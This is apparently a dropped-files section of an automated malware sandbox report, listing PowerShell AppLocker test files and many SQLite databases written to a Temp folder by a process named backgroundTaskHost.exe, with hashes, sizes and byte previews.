                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v4jcpvvy.j12.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vdldeqcs.l20.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vjz32pwt.st1.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wcs4efmi.ivp.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wqhs5p4g.3ty.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xac3umum.bar.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yukaxndv.1ll.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yyb5ittj.w3r.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yzqu5kyr.uar.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zeeks5rt.ok0.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zfahm2di.zas.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zfmy54e2.dfg.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zn54adn4.4fg.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ztuvmrdc.jki.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\aClw3d43H0

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\aTBHIP2sIQ

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\aTxji54riW

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\aaZfllKkLZ

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\b5sbvhDw1p

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\bJlg2D2mHX

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\boxFdHhjw3

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\bq7Kh90INi

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\bzo79s6QPG

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\chQOkZPGXc

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\dFQBcZJxfL

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\dJOjPEatMv

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\daqLQZ1HhR

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
